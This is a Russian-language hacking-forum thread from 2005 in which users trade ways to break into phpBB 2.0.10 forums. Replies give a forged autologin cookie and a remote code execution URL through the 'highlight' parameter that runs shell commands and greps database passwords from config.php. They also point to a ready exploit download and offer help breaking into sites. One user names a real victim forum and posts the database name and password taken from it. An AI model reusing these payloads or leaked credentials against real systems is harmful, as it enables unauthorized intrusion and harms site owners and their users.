Форум АНТИЧАТ - Есть ли уязвимости в phpbb 2.0.10?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Есть ли уязвимости в phpbb 2.0.10? (https://forum.antichat.xyz/showthread.php?t=10642)

maR	09.11.2005 17:52

Есть ли уязвимости в phpbb 2.0.10?

возможен ли взлом? :o

GreenBear

09.11.2005 17:57

sid удаляй, data заменяй на:

Цитата:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A% 225b81c5276ddf1c087a77f34f2cff1ba3%22%3Bs%3A6%3A%2 2userid%22%3Bi%3A8%3B%7D

в куках =))

koldun

09.11.2005 17:58

сначало античат ПРОЧИТАЙ
Уязвимость в phpBB <= 2.0.10

http://[target]/forum/viewtopic.php?p=123&highlight=%2527.$poster=%60$ls %60.%2527&ls=id;uname%20-a;cat%20config.php|grep%20db
Условия срабатывания - тема p=123 должна существовать.

Пример http://[Target]/viewtopic.php?p=44&highlight=%2527.$poster=$dbpass wd.%2527

m0nzt3r

09.11.2005 18:22

а если лень руками вбивать идешь на rst.void.ru качаешь оотуда сплойт на перле для версии 2.0.10 и пользуешься на здоровье=) только вот не думаю что остались сайты с уязвимыми десятками..

*Van*

09.11.2005 18:30

m0nzt3r, я вчера ломал челу форум phpbb 2.0.6 , где было зарегано 14300человек =)

maR, а если ничего не выйдет, смело стучись мне в асю, помогу!

Dark Angel

13.12.2005 05:48

народ чота неработает наверно прикрыли!!!!!

vorishka

13.12.2005 09:47

Цитата:

Сообщение от Dark Angel

народ чота неработает наверно прикрыли!!!!!

А ты точно уверен что десятка стоит? Если не работает:
1. Руки...
2. Прикрыли...
Решение: попробуй снифак зафигачить...

*Van*

13.12.2005 18:12

Dark Angel, стучись в асю или пиши в приват-помогу. =) Десятки(если это действительно десятки) ломаются легко.

Dark Angel

14.12.2005 01:57

да ето десятка там снизу написена же
Powered by phpbb 2.0.10

NeMiNeM

14.12.2005 02:26

Dark Angel
Админ там может написать всё что угодно для замыливания глаз))
На самом деле может быть пропатчен, или же новая версия стоять..
Всё равно удачи те!

Dark Angel

14.12.2005 04:31

я тож так думаю!!!а как-нить можна узнавать какой версии етот форум

fixer2

14.12.2005 07:48

У меня есть схожая проблема. Версия форума - 2.0.10, но он стоит на smallnuke. Какие варианты есть, подскажите?

...еще очень часто встречаю phpbb на пхп-нюках, как их ломать? Все говорят что нюк - самая бажная система, но тем не менее я не смог найти ни один сплоит или sql-inj для современных версий.

NeMiNeM

14.12.2005 19:00

Dark Angel
Попробуй экслойты каких-нить других версий! Может для 2.0.18 или ниже подойдёт?
http://forum.antichat.ru/thread10613.html
Вот почитай!

Dark Angel

15.12.2005 03:54

народ всё работает ето просто все пропеченые наверно паподались!!! после 3 часов поиска нашол нормалный вот он!!!!
http://www.gorodzelenogorsk.ru/forum/index.php

ну палучил вот ето:
dbpasswd---------PawHikat
dbname-----------host2254
заважу в FTP и нифега!!!!
чо может быть с партом ошибся????

Rebz	15.12.2005 03:57

ну вообще-то если ты не видишь у тебя логин и пароль от БД, а не от ФТП.. =)

к сведению: Пароли БД не всегда подходят к ФТП.. так что коннект делай к MySQL =)
имхо)

Dark Angel

15.12.2005 04:44

не понел обясника паподробнее чайнику!!!!!

Otaku

15.12.2005 06:09

Подключись сразу к базе.
По теме
http://forum.antichat.ru/thread11738.html

Время: 20:48